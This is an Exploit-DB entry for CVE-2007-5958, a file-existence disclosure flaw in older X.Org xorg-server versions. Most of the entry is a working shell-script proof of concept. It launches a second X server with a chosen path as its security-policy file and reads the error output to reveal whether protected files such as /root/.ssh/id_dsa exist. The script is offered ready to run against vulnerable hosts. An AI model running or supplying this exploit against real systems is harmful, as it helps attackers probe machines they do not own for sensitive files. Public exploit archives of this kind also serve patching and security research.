X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)

EDB-ID:

5152

CVE:

2007-5958

EDB Verified:

Author:

vl4dZ

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

2008-02-19

Vulnerable App: 
#!/bin/sh
# Xorg file disclosure vulnerability (CVE-2007-5958)
#
# Lame xploit by vl4dZ :))
#
# sh-3.1$ whoami
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# sh-3.1$ ./Xorg-File-Existence-PoC.sh /root/.ssh/id_dsa
# ...
# *** FILE /root/.ssh/id_dsa EXIST !! ***

# Vulnerable: xorg-server <= 1.1.1-48.13

X_EXEC=/usr/bin/X
TMP_FILE=/tmp/X.$$

if [ "$1" = "" ]; then
   echo "usage: $0 <file>"
   exit 1
fi

[ -f ${X_EXEC} ] || (echo "${X_EXEC} not found"; exit 1)

echo -e "\n** Xorg file disclosure vulnerability PoC (CVE-2007-5958) **\n"
echo "A second X server is going to be started, once started, type the "
echo "ctrl+Alt+Backspace sequence and you'll see the result of your request."
echo -en "\nType [Enter] to start: "; read

LANG=c ${X_EXEC} :1 -ac -sp $1 2> ${TMP_FILE}

grep "error opening security policy file" ${TMP_FILE} >/dev/null
if [ $? != 0 ]; then
   echo "*** FILE $1 EXIST !! ***"
else
   echo "*** FILE $1 DOES NOT EXIST !! ***"
fi
rm -f ${TMP_FILE}

echo -e "\nCtrl-C to quit."
sleep 500

# milw0rm.com [2008-02-19]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services